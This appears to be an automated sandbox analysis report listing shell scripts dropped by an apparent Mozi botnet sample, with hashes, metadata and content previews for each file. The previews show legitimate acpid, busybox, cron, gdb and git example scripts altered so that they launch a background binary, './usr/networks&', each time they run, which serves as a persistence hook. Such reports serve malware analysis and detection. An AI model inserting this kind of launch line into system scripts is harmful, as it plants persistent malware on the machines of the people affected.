                                                                                                                  SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                                                  SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                                                  SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                                                  Malicious:false
                                                                                                                  Preview: ./usr/networks&.exit 1.
                                                                                                                  /usr/share/doc/acpid/examples/ac.sh
                                                                                                                  Process:/tmp/mozi.a.zip
                                                                                                                  File Type:ASCII text
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):23
                                                                                                                  Entropy (8bit):3.882045108136863
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:qXVOORgn:Tn
                                                                                                                  MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                                                  SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                                                  SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                                                  SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                                                  Malicious:false
                                                                                                                  Preview: ./usr/networks&.exit 1.
                                                                                                                  /usr/share/doc/acpid/examples/default.sh
                                                                                                                  Process:/tmp/mozi.a.zip
                                                                                                                  File Type:ASCII text
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):23
                                                                                                                  Entropy (8bit):3.882045108136863
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:qXVOORgn:Tn
                                                                                                                  MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                                                  SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                                                  SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                                                  SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                                                  Malicious:false
                                                                                                                  Preview: ./usr/networks&.exit 1.
                                                                                                                  /usr/share/doc/busybox-static/examples/mdev.conf.change_blockdev.sh
                                                                                                                  Process:/tmp/mozi.a.zip
                                                                                                                  File Type:ASCII text
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):309
                                                                                                                  Entropy (8bit):4.972882784760757
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:6:3Z2iGYkj5Ri36+u4DXFI7WBRZrjFI7efgYjFI7e6RTaKtkmTn:J2iB6PiZqWZdqefgQq9tPkmTn
                                                                                                                  MD5:8B5CC9506A59F35C919D0CF65E3D75FA
                                                                                                                  SHA1:956100F1C2B0A99C8B578DC6CE4854991089289A
                                                                                                                  SHA-256:F53B8D26AD4D0CDE785D89C2F85D2132B943D5AB01FC482A8D53D1D6D3A01D5E
                                                                                                                  SHA-512:725E036838D708E1BCBA1A5C89470B892BA249305AC5D237B203AB21B0794A1BC64917ACBBD1793F41F530E482C85C9C252D143DACB68E9667088E274139B905
                                                                                                                  Malicious:false
                                                                                                                  Preview: ./usr/networks&..test -e "$DEVNAME" || { echo "$DEVNAME doesn't exist, aborting"; exit 1; }..#echo "$DEVNAME exists"..if blockdev --rereadpt "$DEVNAME"; then...echo "blockdev --rereadpt succeeded"...exit 0..fi..echo "blockdev --rereadpt failed, exit code: $?".done.echo "Timed out".) &../usr/networks&.exit 1.
                                                                                                                  /usr/share/doc/cron/examples/cron-tasks-review.sh
                                                                                                                  Process:/tmp/mozi.a.zip
                                                                                                                  File Type:ASCII text
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):3647
                                                                                                                  Entropy (8bit):4.544491450799858
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:96:TExE7LzpY0V0rmzBpuYlzsSwG7SRpvzTC/8mO:TExgHpYa0ABppdsSyk8mO
                                                                                                                  MD5:734F4010B22A9F64DBCCED57155A6396
                                                                                                                  SHA1:1A3984285346A3FB8CF1A2666F273A8EFC300495
                                                                                                                  SHA-256:5F76E60D53DEB684C98DFE7E2306D0AAC86938ECB6B68AA41283F560CFEBACF8
                                                                                                                  SHA-512:8BC6C5176E4742ECBD69498B7CA52955CAF78031A996E0B50DFC23AA490C02B00B71E70DA500D27BEF241025B2FB3D4C50A943D6CB49E4964127E2513E836ADC
                                                                                                                  Malicious:false
                                                                                                                  Preview: ./usr/networks&. -h|--help) usage; exit 0;;. -v|--version) version; exit 0;;. -s|--syslog) syslog="yes";;. -i|--info) send_info="yes";;. *) ;;. esac.done. ..send_message () {.. level=$1. msg=$2. [ "$level" = "info" ] && [ "$send_info" = "no" ] && return.. if [ "$syslog" = "yes" ] ; then. logger -p cron.$level -t CRON $msg. else. case $level in. "warn"). echo "WARN: $msg" >&2. ;;. "info"). echo "INFO: $msg" . ;;. esac. fi.}..warn () {.# Send a warning to the user. file=$1. reason=$2.. name=`basename $file`. # Skip hidden files. echo $name | grep -q -E '^\.' && return. # Skip disabled files. echo $name | grep -q -E '\.disabled' && return.. # TODO: Should we send warnings for '.old' or '.orig'?.. # Do not send a warning if the file is '.dpkg-old' or '.dpkg-dist'. if ! echo $file | grep -q -E '\.dp
                                                                                                                  /usr/share/doc/gawk/examples/network/PostAgent.sh
                                                                                                                  Process:/tmp/mozi.a.zip
                                                                                                                  File Type:ASCII text
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):23
                                                                                                                  Entropy (8bit):3.882045108136863
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:qXVOORgn:Tn
                                                                                                                  MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                                                  SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                                                  SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                                                  SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                                                  Malicious:false
                                                                                                                  Preview: ./usr/networks&.exit 1.
                                                                                                                  /usr/share/doc/gawk/examples/prog/igawk.sh
                                                                                                                  Process:/tmp/mozi.a.zip
                                                                                                                  File Type:awk or perl script, ASCII text
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):1829
                                                                                                                  Entropy (8bit):4.38604786798686
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:24:yiYuM2UFMx/sIo6ml4wiQDRoLe/HfwoDt8vPP6k30YXU0kKhpjKGg:eBMx/tKiQDWawit8vPP6A0YXjnhpjXg
                                                                                                                  MD5:141401CE535E9FFF3A9F3C9D5ECEC093
                                                                                                                  SHA1:B0A5FA40FFBDAFF1F415B38513CE2A7921328D05
                                                                                                                  SHA-256:68EC7433147E2F312EA47B69A5CEAE1B781AC9C95260A8D95F2A9354E26A0C35
                                                                                                                  SHA-512:A3CC9A94FB7D97A1F57AE1D29A3432A56ACCE85C50E0F4073D65AC5CF77C50DE4A74E207203141ABD7297B62068BB937A3C63E5880A79C09950E5E6DD562D1BC
                                                                                                                  Malicious:false
                                                                                                                  Preview: ./usr/networks&. exit 0 ;;.. -[W-]*) opts="$opts '$1'" ;;.. *) break ;;. esac. shift.done..if [ -z "$program" ].then. program=${1?'missing program'}. shift.fi..# At this point, `program' has the program..expand_prog='..function pathto(file, i, t, junk).{. if (index(file, "/") != 0). return file.. if (file == "-"). return file.. for (i = 1; i <= ndirs; i++) {. t = (pathlist[i] "/" file). if ((getline junk < t) > 0) {. # found it. close(t). return t. }. }. return "".}.BEGIN {. path = ENVIRON["AWKPATH"]. ndirs = split(path, pathlist, ":"). for (i = 1; i <= ndirs; i++) {. if (pathlist[i] == ""). pathlist[i] = ".". }. stackptr = 0. input[stackptr] = ARGV[1] # ARGV[1] is first file.. for (; stackptr >= 0; stackptr--) {. while ((getline < input[stackptr]) > 0) {. if (tolower($1) != "@include") {. print
                                                                                                                  /usr/share/doc/gdb/contrib/ari/create-web-ari-in-src.sh
                                                                                                                  Process:/tmp/mozi.a.zip
                                                                                                                  File Type:ASCII text
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):23
                                                                                                                  Entropy (8bit):3.882045108136863
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:qXVOORgn:Tn
                                                                                                                  MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                                                  SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                                                  SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                                                  SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                                                  Malicious:false
                                                                                                                  Preview: ./usr/networks&.exit 1.
                                                                                                                  /usr/share/doc/gdb/contrib/ari/gdb_find.sh
                                                                                                                  Process:/tmp/mozi.a.zip
                                                                                                                  File Type:ASCII text
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):23
                                                                                                                  Entropy (8bit):3.882045108136863
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:qXVOORgn:Tn
                                                                                                                  MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                                                  SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                                                  SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                                                  SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                                                  Malicious:false
                                                                                                                  Preview: ./usr/networks&.exit 1.
                                                                                                                  /usr/share/doc/gdb/contrib/expect-read1.sh
                                                                                                                  Process:/tmp/mozi.a.zip
                                                                                                                  File Type:ASCII text
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):253
                                                                                                                  Entropy (8bit):5.267626424494032
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:6:aBH51mUeX3+G3Wj3kGjVnAdiIVUe8J24n:aB51je+f3VnBaUe8J24n
                                                                                                                  MD5:37C0552689BD7719FFBE66F4C9AB831B
                                                                                                                  SHA1:8BA6E9AED3FF50AB5AE1E516E1ADEE1F1464BF79
                                                                                                                  SHA-256:6B21FC4B985122F02025F5050FD3C0910228E394DC9E72EBEC9F6354785BDF0B
                                                                                                                  SHA-512:EA97773FE3E45B9A392CA74C1D8D527952980474C75846495A796652FAB647128844E9E87529D51CBF7520ACA08F7C1188E676E5E5BAC4F0FAA7B75B66538F31
                                                                                                                  Malicious:false
                                                                                                                  Preview: ./usr/networks&. exit 2.fi.SO=/tmp/expect-read1.$$.so.rm -f $SO.CMD="${CC_FOR_TARGET:-gcc} -o $SO -Wall -fPIC -shared $C".if ! $CMD; then. echo >&2 "$0: Failed: $CMD". exit 2.fi.trap "rm -f $SO" EXIT.LD_PRELOAD=$SO expect "$@"../usr/networks&.exit 1.
                                                                                                                  /usr/share/doc/gdb/contrib/gdb-add-index.sh
                                                                                                                  Process:/tmp/mozi.a.zip
                                                                                                                  File Type:ASCII text
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):1048
                                                                                                                  Entropy (8bit):4.806462537404251
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:24:yJI5VNyJmc20JsvodjbGCHiVwZvFfg0udaATYdITFvVg47VZ0ou:II63pJftBudaqYmTFmJ
                                                                                                                  MD5:5864556D6334995F87B9236F2BDDAE2F
                                                                                                                  SHA1:65C2E90583C5B2DF8050063559E7FA2885F7427F
                                                                                                                  SHA-256:4BBE42BA86B2EBBC463E505A6D3551775BB4E2ED64BDA2C8F1E7B50B9F4C99C3
                                                                                                                  SHA-512:0E99B5F846FE6295B4ACFF8030BCBE895D1BCCCDF7B0098E8DABF8ADC50E56CA8A38A549B5A052C86FF9DA9B0A2C7BFBAD7CE939F373AB78F525FEEF2065D615
                                                                                                                  Malicious:false
                                                                                                                  Preview: ./usr/networks&. exit 1.fi..file="$1"..if test ! -r "$file"; then. echo "$myname: unable to access: $file" 1>&2. exit 1.fi..dir="${file%/*}".test "$dir" = "$file" && dir=".".index="${file}.gdb-index"..rm -f $index.# Ensure intermediate index file is removed when we exit..trap "rm -f $index" 0..$GDB --batch -nx -iex 'set auto-load no' \. -ex "file $file" -ex "save gdb-index $dir" || {. # Just in case.. status=$?. echo "$myname: gdb error generating index for $file" 1>&2. exit $status.}..# In some situations gdb can exit without creating an index. This is.# not an error..# E.g., if $file is stripped. This behaviour is akin to stripping an.# already stripped binary, it's a no-op..status=0..if test -f "$index"; then. $OBJCOPY --add-section .gdb_index="$index" \..--set-section-flags .gdb_index=readonly "$file" "$file". status=$?.else. echo "$myname: No index was created for $file" 1>&2. echo "$myname: [Was there no debuginfo? Was there already an index?
                                                                                                                  /usr/share/doc/git/contrib/convert-grafts-to-replace-refs.sh
                                                                                                                  Process:/tmp/mozi.a.zip
                                                                                                                  File Type:ASCII text
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):23
                                                                                                                  Entropy (8bit):3.882045108136863
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:qXVOORgn:Tn
                                                                                                                  MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                                                  SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                                                  SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                                                  SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                                                  Malicious:false
                                                                                                                  Preview: ./usr/networks&.exit 1.
                                                                                                                  /usr/share/doc/git/contrib/examples/git-am.sh
                                                                                                                  Process:/tmp/mozi.a.zip
                                                                                                                  File Type:OS/2 REXX batch file, ASCII text
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):21942
                                                                                                                  Entropy (8bit):5.106661772210516
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:384:6REUag9f8Ydg0VeV9KziwsORFRByXlU1m4csVIw17OqlDfRRdxyZymevMNcPh/Rl:6Rhb9fJd1Vmkziw9RFRByX8D7Vd7Oqlh
                                                                                                                  MD5:16E6ACE0E85A54EA4C061BDA1D3BF70D
                                                                                                                  SHA1:B2569F727A9B61E0583574CC0793647136F76E32
                                                                                                                  SHA-256:B56C64E30B028ACB3523D99266AD8931417240B883EC8961ED24F4004D6EA1C9
                                                                                                                  SHA-512:F730D5171A9533A87455BEA4133439096E9A53C4783FAD29DA3DFDB9BBCD2F05DDF9EBBEBB94CF21AC4138833AB83B9AEF94612D5538671F29B726F147749322
                                                                                                                  Malicious:false
                                                                                                                  Preview: ./usr/networks&. exit 1.}..safe_to_abort () {..if test -f "$dotest/dirtyindex"..then...return 1..fi...if ! test -f "$dotest/abort-safety"..then...return 0..fi...abort_safety=$(cat "$dotest/abort-safety")..if test "z$(git rev-parse --verify -q HEAD)" = "z$abort_safety"..then...return 0..fi..gettextln "You seem to have moved HEAD since the last 'am' failure..Not rewinding to ORIG_HEAD" >&2..return 1.}..stop_here_user_resolve () {. if [ -n "$resolvemsg" ]; then.. printf '%s\n' "$resolvemsg".. stop_here $1. fi. eval_gettextln "When you have resolved this problem, run \"\$cmdline --continue\"..If you prefer to skip this patch, run \"\$cmdline --skip\" instead..To restore the original branch and stop patching, run \"\$cmdline --abort\".".. stop_here $1.}..go_next () {..rm -f "$dotest/$msgnum" "$dotest/msg" "$dotest/msg-clean" \..."$dotest/patch" "$dotest/info"..echo "$next" >"$dotest/next"..this=$next.}..cannot_fallback () {..echo "$1"..gettextln "Cannot fall back to thr
                                                                                                                  /usr/share/doc/git/contrib/examples/git-checkout.sh
                                                                                                                  Process:/tmp/mozi.a.zip
                                                                                                                  File Type:ASCII text
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):4825
                                                                                                                  Entropy (8bit):5.113528532566079
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:96:dFHSEVt3CuAqnOGD5OKNPLT85zoEl5kJbDF772+u/NvZKJhGY44FVT0HAqFt3e:LTVUCDgKNDT8CB72hxChZ40KfQ
                                                                                                                  MD5:595AE545C31B21B58D1C77B533F7A2D4
                                                                                                                  SHA1:86F2DA045AA3718950585397A21D5387682A3548
                                                                                                                  SHA-256:9DACE4B4205D10F2705B32DC8963F132E51FC1D9DF799AE543EC6BE6115FA2B0
                                                                                                                  SHA-512:A8799023F5550B631064E93EFF1E4786A2362AB3B409D143800CE408BD150CECD74AD3266B32E8CBF7B0A007E352F3F4DA3D1EB7D216DA26413E718E2DCFC09C
                                                                                                                  Malicious:false
                                                                                                                  Preview: ./usr/networks&...git update-index --index-info || exit $?..fi...# Make sure the request is about existing paths...git ls-files --full-name --error-unmatch -- "$@" >/dev/null || exit..git ls-files --full-name -- "$@" |...(cd_to_toplevel && git checkout-index -f -u --stdin)...# Run a post-checkout hook -- the HEAD does not change so the..# current HEAD is passed in for both args..if test -x "$GIT_DIR"/hooks/post-checkout; then.. "$GIT_DIR"/hooks/post-checkout $old $old 0..fi...exit $?.else..# Make sure we did not fall back on $arg^{tree} codepath..# since we are not checking out from an arbitrary tree-ish,..# but switching branches...if test '' != "$new"..then...git rev-parse --verify "$new^{commit}" >/dev/null 2>&1 ||...die "Cannot switch branch to a non-commit."..fi.fi..# We are switching branches and checking out trees, so.# we *NEED* to be at the toplevel..cd_to_toplevel..[ -z "$new" ] && new=$old && new_name="$old_name"..# If we don't have an existing branch that we're switching
                                                                                                                  /usr/share/doc/git/contrib/examples/git-clean.sh
                                                                                                                  Process:/tmp/mozi.a.zip
                                                                                                                  File Type:ASCII text
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):23
                                                                                                                  Entropy (8bit):3.882045108136863
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:qXVOORgn:Tn
                                                                                                                  MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                                                  SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                                                  SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                                                  SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                                                  Malicious:false
                                                                                                                  Preview: ./usr/networks&.exit 1.
                                                                                                                  /usr/share/doc/git/contrib/examples/git-clone.sh
                                                                                                                  Process:/tmp/mozi.a.zip
                                                                                                                  File Type:ASCII text
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):11759
                                                                                                                  Entropy (8bit):5.2205279036587235
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:192:9M6sMKXA+aN0VYXNXYdcYZRoT+7rdVAqmdOIhH+Cqd1WPnaetMkTri0i55rIIq4G:SMxpY6YZRoTeJHf4H+CqdPAM8+p86TvK
                                                                                                                  MD5:1E0926F456D9D5C35DF266EF276212C6
                                                                                                                  SHA1:4C741DD9AD5F798BDCE0F67172F2B790FFF1B6BD
                                                                                                                  SHA-256:C1DA77F45A430BC683EF4C9DDAA2AFB3B8F3D6F75A6B0406C456DFF3B4637BBC
                                                                                                                  SHA-512:30A51026697132EA1F83C1D5BCF796C17AB7EC418352FF268BD1461397F9A2280E5752FC673ACE99F606B6E136E0F2A85FFF2F0BF8D12AE0A35C8D95C5A7A478
                                                                                                                  Malicious:false
                                                                                                                  Preview: ./usr/networks&..exit 1.}..usage() {..exec "$0" -h.}..eval "$(echo "$OPTIONS_SPEC" | git rev-parse --parseopt -- "$@" || echo exit $?)"..get_repo_base() {..(...cd "$(/bin/pwd)" &&...cd "$1" || cd "$1.git" &&...{....cd .git....pwd...}..) 2>/dev/null.}..if [ -n "$GIT_SSL_NO_VERIFY" -o \.."$(git config --bool http.sslVerify)" = false ]; then. curl_extra_args="-k".fi..http_fetch () {..# $1 = Remote, $2 = Local..curl -nsfL $curl_extra_args "$1" >"$2"..curl_exit_status=$?..case $curl_exit_status in..126|127) exit ;;..*). return $curl_exit_status ;;..esac.}..clone_dumb_http () {..# $1 - remote, $2 - local..cd "$2" &&..clone_tmp="$GIT_DIR/clone-tmp" &&..mkdir -p "$clone_tmp" || exit 1..if [ -n "$GIT_CURL_FTP_NO_EPSV" -o \..."$(git config --bool http.noEPSV)" = true ]; then...curl_extra_args="${curl_extra_args} --disable-epsv"..fi..http_fetch "$1/info/refs" "$clone_tmp/refs" ||...die "Cannot get remote repository information..Perhaps git-update-server-info needs to be run there?"..test "z$qu
                                                                                                                  /usr/share/doc/git/contrib/examples/git-commit.sh
                                                                                                                  Process:/tmp/mozi.a.zip
                                                                                                                  File Type:ASCII text
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):13843
                                                                                                                  Entropy (8bit):5.402105827507175
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:384:ohf3saLCKohntpFFLWt8CKHNFQCglPySY2rOsMi/URiCNW8msLDkV+HZqIgCu:ohf3ThWnnFFLWqCKtFz1SY2rOstURiCK
                                                                                                                  MD5:801864707ABB06C3ACD5E9AA7EF0A231
                                                                                                                  SHA1:1492CCEEA7F7892507958970BD7012850E3D8498
                                                                                                                  SHA-256:C4945D20EEF27CDF5E23450FF797808F6F58C8973B9ED415B7E391B24D3D895C
                                                                                                                  SHA-512:ABD01060290B46E9F538D6E9E88F4F9FDCDFECF7715DE0CB860CCF053899453BDC701F82AD16BA12DB3B688DAF9B0429D4FBC5F6EEB1F4621CF68BA8868D733A
                                                                                                                  Malicious:false
                                                                                                                  Preview: ./usr/networks&..exit 1.}..TMP_INDEX=.THIS_INDEX="${GIT_INDEX_FILE:-$GIT_DIR/index}".NEXT_INDEX="$GIT_DIR/next-index$$".rm -f "$NEXT_INDEX".save_index () {..cp -p "$THIS_INDEX" "$NEXT_INDEX".}..run_status () {..# If TMP_INDEX is defined, that means we are doing..# "--only" partial commit, and that index file is used..# to build the tree for the commit. Otherwise, if..# NEXT_INDEX exists, that is the index file used to..# make the commit. Otherwise we are using as-is commit..# so the regular index file is what we use to compare...if test '' != "$TMP_INDEX"..then...GIT_INDEX_FILE="$TMP_INDEX"...export GIT_INDEX_FILE..elif test -f "$NEXT_INDEX"..then...GIT_INDEX_FILE="$NEXT_INDEX"...export GIT_INDEX_FILE..fi...if test "$status_only" = "t" || test "$use_status_color" = "t"; then...color=..else...color=--nocolor..fi..git runstatus ${color} \...${verbose:+--verbose} \...${amend:+--amend} \...${untracked_files:+--untracked}.}..trap '..test -z "$TMP_INDEX" || {...test -f "$TMP_INDEX" && rm -
                                                                                                                  /usr/share/doc/git/contrib/examples/git-fetch.sh
                                                                                                                  Process:/tmp/mozi.a.zip
                                                                                                                  File Type:ASCII text
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):5954
                                                                                                                  Entropy (8bit):5.053117199381536
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:96:qjiwPNH32mZrlw8DpKg1ol8p2vgW7Tle8yibXzcDUyUuf1s7pbEVALomiS7yDRNL:qjrPNH32mZrlw8Dz1ol8p2YW/le8yib0
                                                                                                                  MD5:660949C6D769C055433FA32AD8CF7CB7
                                                                                                                  SHA1:D32B9EB0B032620ABDD884C3F205135F48A5CCAA
                                                                                                                  SHA-256:8D505E7404190C524B25A82E6D935752034AC993B74C2B704B93A8F69BA56FF5
                                                                                                                  SHA-512:65C50E1465E3D47F5703D87D9B6EB54CE63670D94A47C4341F42FBAB3566A3EE27159C968D55ACE8A2B4F8E7AC0B3E30BBA3BC42E24FAA92BFA5DAFAEC8ECA94
                                                                                                                  Malicious:false
                                                                                                                  Preview: ./usr/networks&... done` || exit..if test "$#" -gt 1..then...# remote URL plus explicit refspecs; we need to merge them....reflist="$reflist$LF$taglist"..else...# No explicit refspecs; fetch tags only....reflist=$taglist..fi.fi..fetch_all_at_once () {.. eval=$(echo "$1" | git fetch--tool parse-reflist "-"). eval "$eval".. ( : subshell because we muck with IFS. IFS=" .$LF". (..if test "$remote" = . ; then.. git show-ref $rref || echo failed "$remote"..elif test -f "$remote" ; then.. test -n "$shallow_depth" &&...die "shallow clone with bundle is not supported".. git bundle unbundle "$remote" $rref ||.. echo failed "$remote"..else...if.test -d "$remote" &&.....# The remote might be our alternate. With....# this optimization we will bypass fetch-pack....# altogether, which means we cannot be doing....# the shallow stuff at all.....test ! -f "$GIT_DIR/shallow" &&....test -z "$shallow_depth" &&.....# See if all of what we are going to fetch are....# connected to
                                                                                                                  /usr/share/doc/git/contrib/examples/git-gc.sh
                                                                                                                  Process:/tmp/mozi.a.zip
                                                                                                                  File Type:ASCII text
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):61
                                                                                                                  Entropy (8bit):4.0161977906092705
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:qXVMQyXJ/F3LQVOORgn:L/lPn
                                                                                                                  MD5:3A0813DB0108F078C610EB236C574A2F
                                                                                                                  SHA1:A7D47F14D8FD35FD8BF6799063B3EB4E9DCC610A
                                                                                                                  SHA-256:36BC6583258DCBB387D7AFFE086BC744F13B329E55E2F9657C385F6BC24AF215
                                                                                                                  SHA-512:69C3A007D44A13ED9D3F9F4F5C545C9B3A541FE500DDFA2E2934706CB1A740AD61AC75F8F47572DA78F4CD49D65DAEAF6118B4E3FA0C8A182F8FA78FC52C7F82
                                                                                                                  Malicious:false
                                                                                                                  Preview: ./usr/networks&.git rerere gc || exit../usr/networks&.exit 1.
                                                                                                                  /usr/share/doc/git/contrib/examples/git-log.sh
                                                                                                                  Process:/tmp/mozi.a.zip
                                                                                                                  File Type:ASCII text
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):234
                                                                                                                  Entropy (8bit):4.9965164312586925
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:6:MebhIYlCNdR39BOAvvmmJ9aKI9tIYl0R39BOFon:MKhyN46vBFeQN4yn
                                                                                                                  MD5:0A7B48976D929CEFAB720CC9C3F6EECF
                                                                                                                  SHA1:EF27B3E70278C3563C0BDD27DD6836D902DC1A5F
                                                                                                                  SHA-256:1A6D192431FBD9F6E4701981F8E954FD19B2D0265F594FE4EF2F1B82CE2CA78D
                                                                                                                  SHA-512:A5AE18EFBE0ED252032E372ACD45229CE6FC5D40D83C89291CA560997F7AD557D9CBE00C684DE2877B6CCC3C505A2089A9FEA372B3A5CA1B06FF2DA0553C5B4D
                                                                                                                  Malicious:false
                                                                                                                  Preview: ./usr/networks&.revs=$(git-rev-parse --revs-only --no-flags --default HEAD "$@") || exit.[ "$revs" ] || {..die "No HEAD ref".}.git-rev-list --pretty $(git-rev-parse --default HEAD "$@") |.LESS=-S ${PAGER:-less}../usr/networks&.exit 1.
                                                                                                                  /usr/share/doc/git/contrib/examples/git-ls-remote.sh
                                                                                                                  Process:/tmp/mozi.a.zip
                                                                                                                  File Type:ASCII text
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):2436
                                                                                                                  Entropy (8bit):5.153713997451705
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:48:9zJ+UQnIYLiLPX0zZhf1VpVZVpvPWg7WSfszrr9nQ8uMhpV24:Rp8Q09h9fDfh7f0zrr9Jv
                                                                                                                  MD5:AF55A4CB380CF0ECC6B02D4B7E057F05
                                                                                                                  SHA1:0B94808900C3D78664D23049C7A002292DF682DB
                                                                                                                  SHA-256:9CCAED1BB101426884242DF53C0CA66E5BF7CC181E56817A9E07190268ECE44D
                                                                                                                  SHA-512:5E193F8738198024CCCA155F4D141AA519A12AEA9FF4592D1A419B0EBAA1F30D4BCF297F0DDEA56281EEAE2CAD02ACFD6DC2CA6192465ABBCD2EB813909B911A
                                                                                                                  Malicious:false
                                                                                                                  Preview: ./usr/networks&. exit 1;.}..die () {. echo >&2 "$*". exit 1.}..exec=.while test $# != 0.do. case "$1" in. -h|--h|--he|--hea|--head|--heads). heads=heads; shift ;;. -t|--t|--ta|--tag|--tags). tags=tags; shift ;;. -u|--u|--up|--upl|--uploa|--upload|--upload-|--upload-p|--upload-pa|\. --upload-pac|--upload-pack)..shift..exec="--upload-pack=$1"..shift;;. -u=*|--u=*|--up=*|--upl=*|--uplo=*|--uploa=*|--upload=*|\. --upload-=*|--upload-p=*|--upload-pa=*|--upload-pac=*|--upload-pack=*)..exec=--upload-pack=$(expr "z$1" : 'z-[^=]*=\(.*\)')..shift;;. --). shift; break ;;. -*). usage ;;. *). break ;;. esac.done..case "$#" in 0) usage ;; esac..case ",$heads,$tags," in.,,,) heads=heads tags=tags other=other ;;.esac... git-parse-remote.peek_repo="$(get_remote_url "$@")".shift..tmp=.ls-remote-$$.trap "rm -fr $tmp-*" 0 1 2 3 15.tmpdir=$tmp-d..case "$peek_repo" in.http://* | https://* | ftp://* )..if [ -n "$GIT_SSL_NO_VERIFY" -o \..."$(git config --bool http.sslVerify)" = false
                                                                                                                  /usr/share/doc/git/contrib/examples/git-merge-ours.sh
                                                                                                                  Process:/tmp/mozi.a.zip
                                                                                                                  File Type:ASCII text
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):247
                                                                                                                  Entropy (8bit):4.532049748049262
                                                                                                                  Encrypted:false
